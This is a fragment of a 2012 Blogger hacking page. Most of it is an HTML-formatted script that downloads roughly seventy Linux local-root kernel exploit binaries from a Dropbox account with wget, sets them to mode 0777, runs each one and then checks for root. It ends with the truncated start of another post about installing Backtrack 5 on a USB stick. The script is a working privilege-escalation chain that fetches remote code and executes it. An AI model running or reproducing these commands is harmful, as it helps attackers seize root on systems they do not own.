/></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/2-6-37; </span><span style="color: #0000bb;">chmod 0777 2</span><span style="color: #007700;">-</span><span style="color: #0000bb;">6</span><span style="color: #007700;">-</span><span style="color: #0000bb;">37</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">2</span><span style="color: #007700;">-</span><span style="color: #0000bb;">6</span><span style="color: #007700;">-</span><span style="color: #0000bb;">37</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/2.6.18-6-x86-2011; </span><span style="color: #0000bb;">chmod 0777 2.6.18</span><span style="color: #007700;">-</span><span style="color: #0000bb;">6</span><span style="color: #007700;">-</span><span style="color: #0000bb;">x86</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2011</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">2.6.18</span><span style="color: #007700;">-</span><span style="color: #0000bb;">6</span><span style="color: #007700;">-</span><span style="color: #0000bb;">x86</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2011</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/2.6.18-164-2010; </span><span style="color: #0000bb;">chmod 0777 2.6.18</span><span style="color: #007700;">-</span><span style="color: #0000bb;">164</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2010</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">2.6.18</span><span style="color: #007700;">-</span><span style="color: #0000bb;">164</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2010</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/2.6.18-194; </span><span style="color: #0000bb;">chmod 0777 2.6.18</span><span style="color: #007700;">-</span><span style="color: #0000bb;">194</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">2.6.18</span><span style="color: #007700;">-</span><span style="color: #0000bb;">194</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/2.6.18-194.1-2010; </span><span style="color: #0000bb;">chmod 0777 2.6.18</span><span style="color: #007700;">-</span><span style="color: #0000bb;">194.1</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2010</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">2.6.18</span><span style="color: #007700;">-</span><span style="color: #0000bb;">194.1</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2010</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/acid; </span><span style="color: #0000bb;">chmod 0777 acid</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">acid</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/2.6.18-194.2-2010; </span><span style="color: #0000bb;">chmod 0777 2.6.18</span><span style="color: #007700;">-</span><span style="color: #0000bb;">194.2</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2010</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">2</span><span style="color: #007700;">=</span><span style="color: #0000bb;">2.6.18</span><span style="color: #007700;">-</span><span style="color: #0000bb;">194.2</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2010</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/2.6.18-274-2011; </span><span style="color: #0000bb;">chmod 0777 2.6.18</span><span style="color: #007700;">-</span><span style="color: #0000bb;">274</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2011</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">2.6.18</span><span style="color: #007700;">-</span><span style="color: #0000bb;">274</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2011</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/2.6.18-374.12.1.el5-2012; </span><span style="color: #0000bb;">chmod 0777 2.6.18</span><span style="color: #007700;">-</span><span style="color: #0000bb;">374.12.1</span><span style="color: #007700;">.</span><span style="color: #0000bb;">el5</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2012</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">2.6.18</span><span style="color: #007700;">-</span><span style="color: #0000bb;">374.12.1</span><span style="color: #007700;">.</span><span style="color: #0000bb;">el5</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2012</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/2.6.28-2011; </span><span style="color: #0000bb;">chmod 0777 2.6.28</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2011</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">2.6.28</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2011</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/2.6.32-46.1.BHsmp; </span><span style="color: #0000bb;">chmod 0777 2.6.32</span><span style="color: #007700;">-</span><span style="color: #0000bb;">46.1</span><span style="color: #007700;">.</span><span style="color: #0000bb;">BHsmp</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">2.6.32</span><span style="color: #007700;">-</span><span style="color: #0000bb;">46.1</span><span style="color: #007700;">.</span><span style="color: #0000bb;">BHsmp</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/2.6.33; </span><span style="color: #0000bb;">chmod 0777 2.6.33</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">2.6.33</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/2.6.33-2011; </span><span style="color: #0000bb;">chmod 0777 2.6.33</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2011</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">2.6.33</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2011</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/2.6.34-2011Exploit1; </span><span style="color: #0000bb;">chmod 0777 2.6.34</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2011Exploit1</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">2.6.34</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2011Exploit1</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/2.6.34-2011Exploit2; </span><span style="color: #0000bb;">chmod 0777 2.6.34</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2011Exploit2</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">2.6.34</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2011Exploit2</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/2.6.37; </span><span style="color: #0000bb;">chmod 0777 2.6.37</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">2.6.37</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/2.6.37-rc2; </span><span style="color: #0000bb;">chmod 0777 2.6.37</span><span style="color: #007700;">-</span><span style="color: #0000bb;">rc2</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">2.6.37</span><span style="color: #007700;">-</span><span style="color: #0000bb;">rc2</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/2.34-2011Exploit1; </span><span style="color: #0000bb;">chmod 0777 2.34</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2011Exploit1</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">2.34</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2011Exploit1</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/3; </span><span style="color: #0000bb;">chmod 0777 3</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">3</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/4; </span><span style="color: #0000bb;">chmod 0777 4</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">4</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/5; </span><span style="color: #0000bb;">chmod 0777 5</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">5</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/6; </span><span style="color: #0000bb;">chmod 0777 6</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">6</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /><br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/7; </span><span style="color: #0000bb;">chmod 0777 7</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">7</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /><br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/7-2; </span><span style="color: #0000bb;">chmod 0777 7</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">7</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /><br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/7x; </span><span style="color: #0000bb;">chmod 0777 7x</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">7x</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/8; </span><span style="color: #0000bb;">chmod 0777 8</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">8</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/9; </span><span style="color: #0000bb;">chmod 0777 9</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">9</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/10; </span><span style="color: #0000bb;">chmod 0777 10</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">10</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/11; </span><span style="color: #0000bb;">chmod 0777 11</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">11</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/13x; </span><span style="color: #0000bb;">chmod 0777 13x</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">13x</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/14;<br /></span><span style="color: #0000bb;">chmod 0777 14</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">14</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/15.sh; </span><span style="color: #0000bb;">chmod 0777 15.sh</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">15.sh</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/16; </span><span style="color: #0000bb;">chmod 0777 16</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">16</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/16-1; </span><span style="color: #0000bb;">chmod 0777 16</span><span style="color: #007700;">-</span><span style="color: #0000bb;">1</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">16</span><span style="color: #007700;">-</span><span style="color: #0000bb;">1</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/18; </span><span style="color: #0000bb;">chmod 0777 18</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">18</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/18-5; </span><span style="color: #0000bb;">chmod 0777 18</span><span style="color: #007700;">-</span><span style="color: #0000bb;">5</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">18</span><span style="color: #007700;">-</span><span style="color: #0000bb;">5</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/31; </span><span style="color: #0000bb;">chmod 0777 31</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">31</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/36-rc1; </span><span style="color: #0000bb;">chmod 0777 36</span><span style="color: #007700;">-</span><span style="color: #0000bb;">rc1</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">36</span><span style="color: #007700;">-</span><span style="color: #0000bb;">rc1</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/44; </span><span style="color: #0000bb;">chmod 0777 44</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">44</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/15150; </span><span style="color: #0000bb;">chmod 0777 15150</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">15150</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/15200; </span><span style="color: #0000bb;">chmod 0777 15200</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">15200</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/exp1; </span><span style="color: #0000bb;">chmod 0777 exp1</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">exp1</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/exp2; </span><span style="color: #0000bb;">chmod 0777 exp2</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">exp2</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/exp3; </span><span style="color: #0000bb;">chmod 0777 exp3</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">exp3</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/exploit; </span><span style="color: #0000bb;">chmod 0777 exploit</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">exploit</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/full-nelson; </span><span style="color: #0000bb;">chmod 0777 full</span><span style="color: #007700;">-</span><span style="color: #0000bb;">nelson</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">full</span><span style="color: #007700;">-</span><span style="color: #0000bb;">nelson</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/gayros; </span><span style="color: #0000bb;">chmod 0777 gayros</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">gayros</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/lenis.sh; </span><span style="color: #0000bb;">chmod 0777 lenis</span><span style="color: #007700;">.</span><span style="color: #0000bb;">sh</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">lenis</span><span style="color: #007700;">.</span><span style="color: #0000bb;">sh</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/local-root-exploit-gayros; </span><span style="color: #0000bb;">chmod 0777 local</span><span style="color: #007700;">-</span><span style="color: #0000bb;">root</span><span style="color: #007700;">-</span><span style="color: #0000bb;">exploit</span><span style="color: #007700;">-</span><span style="color: #0000bb;">gayros</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">local</span><span style="color: #007700;">-</span><span style="color: #0000bb;">root</span><span style="color: #007700;">-</span><span style="color: #0000bb;">exploit</span><span style="color: #007700;">-</span><span style="color: #0000bb;">gayros</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/pwnkernel; </span><span style="color: #0000bb;">chmod 0777 pwnkernel</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">pwnkernel</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/root1; </span><span style="color: #0000bb;">chmod 0777 root1</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">root1</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/root.py; </span><span style="color: #0000bb;">chmod 0777 root</span><span style="color: #007700;">.</span><span style="color: #0000bb;">py</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">root</span><span style="color: #007700;">.</span><span style="color: #0000bb;">py</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/runx; </span><span style="color: #0000bb;">chmod 0777 runx</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">runx</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/tivoli; </span><span style="color: #0000bb;">chmod 0777 tivoli</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">tivoli</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/ubuntu; </span><span style="color: #0000bb;">chmod 0777 ubuntu</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">ubuntu</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/vmsplice-local-root-exploit;<br /></span><span style="color: #0000bb;">chmod 0777 vmsplice</span><span style="color: #007700;">-</span><span style="color: #0000bb;">local</span><span style="color: #007700;">-</span><span style="color: #0000bb;">root</span><span style="color: #007700;">-</span><span style="color: #0000bb;">exploit</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">vmsplice</span><span style="color: #007700;">-</span><span style="color: #0000bb;">local</span><span style="color: #007700;">-</span><span style="color: #0000bb;">root</span><span style="color: #007700;">-</span><span style="color: #0000bb;">exploit</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/z1d-2011; </span><span style="color: #0000bb;">chmod 0777 z1d</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2011</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">z1d</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2011</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">; </span></span></code></code></div>
</div>
</div>
<br />
<i>©2012, copyright BLACK BURN </i></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3436039399135336524.post-53581558180609677772012-07-16T14:38:00.003+06:002012-07-19T23:24:58.830+06:00Install Backtrack 5 on USB flash memory stick<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<img alt="" height="191" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAUUAAACWCAIAAADGyw0/AAAgAElEQVR4nHS9+ZtlaVUlTJzzDnt4T2TkUDlVVuUYOUbGPM93jnme54ics7IGwKEQVGibqRhERWnQbqAVuxDER0ptBrFomwdBQEFAPkQUFGr0j/h+2GefvCnfV8/73OfGjXOj8pd11t5rrb3Pa/g1rwk1NaGmJqmpSV7zmtqamrqamv01Nftrag7W1DxUU3OkpuZYFB2Pokei6FQUnYmiC3F8KY4b4vhqHF+K4/oouhDHDXHcYky7Ma3GtBnTYUyvtb3W9ljbbW2Xse3GtBnTor/tNqbXmG5jOo3pNWbAmEFj+o3pN6bXmB5juq3tM6bPmAFj+ozptXbI2qK1OWtz1vbLNfrd3qrvduuvOowZMGbY2iFj+q0dsLbP2n5re4zpMKbLmD5jhq0dNGbY2qK1Jety1sqV/dYOWTvm3IhzI87lrS04V3Su4v2o95Pez3o/CzADsAiwDrAOsIK4CjAHMAewBLCoZxVgDXEFcRVxHXGbaJtoDXFJzzziDMAi4hLSIuIC4CzgFMA0wDTAJuIW4RrRKtEa0TLiIuIi4jLiItE8opwpxEnACYAxgBJAEWAMoAKQ9z7vfcH7nPfD3g95P+x9zvsywCjABOIE4iTiAtE80TzRItFaCBshrDKvMa+HsMK8GsJWCJshzDHPEo0SVhDLiBXEKaIZogmiKaYZZjnzzMvMS8zzzHPM08RTRJNEo0TyxSJCHiCPWCGqyCtRAXEIcRgxhzgA2APQDdAB0AHQ7n03QDdAL0A7QBtAG0CL9x3edwF0AbQDtAK0AzQ51+DcFWubvZfLOgDaADoBugDaAC471+h9E4CcVoAWPc0ATQDNAO0AXYhdiD1EHYjNAM0ArQDNAM3eNwI0yVcQWwHaAFsBWxHlL7QitiA2AFz2/qL3l71v8NAIkH2rGeCKnkaAKwAXvD/r3Gnnzjl/wfvz3p/z/oxzJ517xNpjxhw15ogxh405ZMzBON4fRfujaF8U1UZRIqemRt68hmtqgp6kpqa2pmZfFZ4P19Qcrak5XlNzPIoeqak5GUVno+hiHF+O48tRdDWOL0bRuSi6FMdX4rhZEduieO4zps/aPmN7jO00ptOYDmPaFUv9Cste+dGYXj09xnQqMjOED1g7bO2wtUPW9hvTbUy3MYL5nuwuoCDvjOO2OO7RO8KQMUPGDFtbsHbA2G5j+o0ZsjavN4iitRXrhq0dsHbQmEFrh60tOTfiXNHagnNla8vOVZwbdW7K+zmAOe/nAdYANhE3EVcAlgEWEOYBVhAF0ksAq4hriMuIK4ibRDtE64iriMuIy4iriIuI84jLiALXJcRFxBmAMe+nvd8m2iTaJFojWiNaQVxAXCZa1tc5xFmAKcBpgCnAScCK9wWAMviy94JnwfCgcwPODTqX874CMIk4JTcCxBnEeaIl5hXm9RDWQ1gJYZ15LYTVEDZC2AxhO0nmmMcRK4gVgAriONI88wLzNNMc8zzzrJ45xfMM0STRJNEE0YjiuYxYQCwglonKRKNEo0RlxBxiDjGPOIgpngWugsZuRbgAtc37du8z2LcDdAJ0ArR5f9W5Vu+z20GnAN77Ju8vOtfgfTNAE/hG75u8F7hWn1aATsRuxA7EdkTBYRtAk/dXvW8AaARoBmhR/LcCtiC2ILYjtiG2IjYpYq/qxdU3jgYAgfpVgMsA570/69wp5846d8H7c96f008esfa4tceMFUg/ZMyBON4fRXVRtE8hfR/V/wnPAmbh5wNVeD5WU3OiJjoZRacFzwrgK3F8IYrqo+iSia8a02xMq54OY7qE64wVWPYY0yN0bUyfMYOKpQFjhqwd1Gu6jOl6EM8Z4P